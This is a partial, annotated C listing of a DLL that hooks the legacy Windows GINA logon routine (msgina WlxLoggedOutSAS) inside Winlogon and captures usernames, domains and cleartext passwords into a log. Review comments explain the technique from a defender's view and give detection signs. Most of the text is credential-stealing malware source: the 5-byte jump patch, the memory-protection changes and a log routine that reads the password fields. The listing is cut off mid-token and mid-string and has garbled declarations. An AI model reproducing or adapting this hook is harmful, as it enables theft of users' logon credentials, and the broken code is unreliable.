// NOTE(review): this page is a partial listing, reproduced here token-for-token.
// It begins mid-token ("ol isWin2K()" is presumably "bool isWin2K()") and ends
// mid-string inside WriteLog. Several declarations also lost the space between
// type and name as printed (HMODULEhMsgina, unsigned charOldCode[6],
// PWLX_MPR_NOTIFY_INFOpNprNotifyInfo) - apparently a rendering artifact of the page.
//
// What this code is, from a defender's view: a DLL that, once loaded into the
// process hosting msgina.dll (Winlogon on the OS generations this targets),
// overwrites the first 5 bytes of the exported WlxLoggedOutSAS with a jmp to
// FunNewADDR (declared elsewhere), and whose WriteLog receives a
// PWLX_MPR_NOTIFY_INFO holding pszUserName, pszDomain, pszPassword and
// pszOldPassword - i.e. an inline hook on the legacy GINA logon path that
// captures interactive logon credentials.
//
// Detection notes: an unexpected module loaded into Winlogon, and a modified
// prologue on msgina!WlxLoggedOutSAS (in-memory bytes differing from the on-disk
// image), are the observable artifacts of this technique. msgina.dll / GINA was
// removed from Windows Vista onward, so this only concerns the legacy versions
// that isWin2K() distinguishes between.

ol isWin2K()  // Determine the OS version: true only for major 5 / minor 0 (Windows 2000).
{
    DWORD winVer;
    OSVERSIONINFO *osvi;
    winVer=GetVersion();
    if(winVer<0x80000000)
    {
        osvi= (OSVERSIONINFO *)malloc(sizeof(OSVERSIONINFO));
        if (osvi!=NULL)
        {
            memset(osvi,0,sizeof(OSVERSIONINFO));
            osvi->dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
            GetVersionEx(osvi);
            if(osvi->dwMajorVersion==5L&&osvi->dwMinorVersion==0L)
            {
                free(osvi);
                return true;
            }
        }
    }
    free(osvi);
    return false;
}

#pragma pack(1)  // Byte-pack the hook table (no padding between members).
struct HookTable{
    HMODULEhMsgina;                // (as printed) handle of msgina.dll, filled in by StartHook
    WlxLoggedOutSAS OldDDR;        // original export address; used again by UnHookWlxLoggedOutSAS
    WlxLoggedOutSAS NewADDR;       // replacement routine the patched prologue jumps to
    unsigned charOldCode[6];       // (as printed) saved original prologue bytes
    unsigned charJmpCode[6];       // (as printed) 5-byte jmp written over the prologue
};  // Custom structure holding all hook state.

// Initializer as printed on the page. The two string initializers are what the
// page shows verbatim; the author's comments describe them as "first 5 bytes"
// and "e9, jmp" respectively.
HookTable hooktable = {
    0 ,
    0 ,
    &FunNewADDR ,
    "/x8B/xFF/x55/x8B/xEC",   // first 5 bytes (author's comment)
    "/xE9/x00/x00/x00/x00"    // e9, jmp (author's comment)
}; /* #pragma pack()   (as printed: this block comment is never closed on the page)

// DLL entry point. On Windows 2000 the saved prologue bytes are swapped for a
// different sequence (author's note: Win2K's first five bytes differ from
// XP/2003); on process attach a worker thread runs StartHook. Only
// DLL_PROCESS_ATTACH is handled; the switch has no default.
BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved )
{
    if(isWin2K())  // Win2K's first five bytes differ from XP/2003
    {
        hooktable.OldCode[0] ='/x55';
        hooktable.OldCode[1] ='/x8B';
        hooktable.OldCode[2] ='/xEC';
        hooktable.OldCode[3] ='/x83';
        hooktable.OldCode[4] ='/xEC';
    }
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        HANDLE hthread = CreateThread( 0 , 0 , LPTHREAD_START_ROUTINE(StartHook) , 0 , 0 , 0);
        CloseHandle( hthread );  // thread handle dropped immediately; the thread keeps running
        break;
    }
    return TRUE;
}

// Thread routine: locates msgina!WlxLoggedOutSAS, computes the rel32 displacement
// for the jmp stored in hooktable.JmpCode, then installs the patch. Returns 0 in
// every case; a missing module or export simply means no hook is installed.
DWORD WINAPI StartHook(LPVOID lpParameter)
{
    hooktable.hMsgina = GetModuleHandle( _T("msgina.dll"));
    if ( hooktable.hMsgina == NULL)
    {
        return 0 ;
    }
    hooktable.OldDDR = (WlxLoggedOutSAS)GetProcAddress( hooktable.hMsgina , _T("WlxLoggedOutSAS") );  // original function address; needed later to remove the hook
    if (hooktable.OldDDR == NULL)
    {
        return 0 ;
    }
    unsigned char *p = (unsigned char *)hooktable.OldDDR;   // unused in this function
    int *OpCode = (int *)&hooktable.JmpCode[1];  // 4-byte operand slot following the opcode byte
    int Code = (int)hooktable.NewADDR - (int)hooktable.OldDDR - 5;  // displacement relative to the end of the 5-byte instruction
    *OpCode = Code;
    HookWlxLoggedOutSAS();
    return 0;
}

// Copies hooktable.JmpCode over the first 5 bytes of WlxLoggedOutSAS. The page
// is temporarily made PAGE_EXECUTE_READWRITE and the previous protection is
// restored afterwards. Return values of VirtualProtect are not checked.
void HookWlxLoggedOutSAS()
{
    DWORD OldProtect = NULL;
    VirtualProtect( hooktable.OldDDR , 5 , PAGE_EXECUTE_READWRITE , &OldProtect );  // memory access permission
    unsigned char *p = (unsigned char *)hooktable.OldDDR;
    for (int i=0 ; i < 5 ; i++ )
    {
        p[i] = hooktable.JmpCode[i];
    }
    VirtualProtect( hooktable.OldDDR , 5 ,
                    OldProtect , &OldProtect );
    return;
}

// Inverse of HookWlxLoggedOutSAS: writes hooktable.OldCode back over the same
// 5 bytes. Nothing on this page calls it.
void UnHookWlxLoggedOutSAS()
{
    DWORD OldProtect = NULL;
    VirtualProtect( hooktable.OldDDR , 5 , PAGE_EXECUTE_READWRITE , &OldProtect );
    unsigned char *p = (unsigned char *)hooktable.OldDDR;
    for (int i=0 ; i < 5 ; i++ )
    {
        p[i] = hooktable.OldCode[i];
    }
    VirtualProtect( hooktable.OldDDR , 5 , OldProtect , &OldProtect );
    return;
}

char pBuffer[1124];  // file-scope scratch buffer shared by WriteLog

// Receives the GINA notify block and formats the captured fields (user, domain,
// password, old password - all read via lstrlenW below) into a log string.
// Author's description: "mainly some file operations". The function body runs
// past the end of this page; the wsprintfW format string is cut mid-literal.
void WriteLog(PWLX_MPR_NOTIFY_INFOpNprNotifyInfo)  // (as printed) parameter lost its type/name space
{
    int size_u = lstrlenW( pNprNotifyInfo->pszUserName );
    size_u += lstrlenW( pNprNotifyInfo->pszDomain );
    size_u += lstrlenW( pNprNotifyInfo->pszPassword );     // cleartext logon password is read here
    size_u += lstrlenW( pNprNotifyInfo->pszOldPassword );
    unsigned short *pWBuffer = (unsigned short *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
    unsigned short *tWBuffer = (unsigned short *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
    char pBuffer1[1124];
    char *pwd =(char *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
    char *pwd2 =(char *)GlobalAlloc( GMEM_FIXED , size_u + 1024*3 );
    ZeroMemory( pWBuffer , size_u + 1024 );
    ZeroMemory( pBuffer , size_u + 1024 );
    ZeroMemory( pBuffer1 , size_u + 1024 );
    if ( !pBuffer )
    {
        return;
    }else
    {
        WriteCurrentTime();
        wsprintfW( pWBuffer , L"/r/nUser= %s /r/nDomain = %s |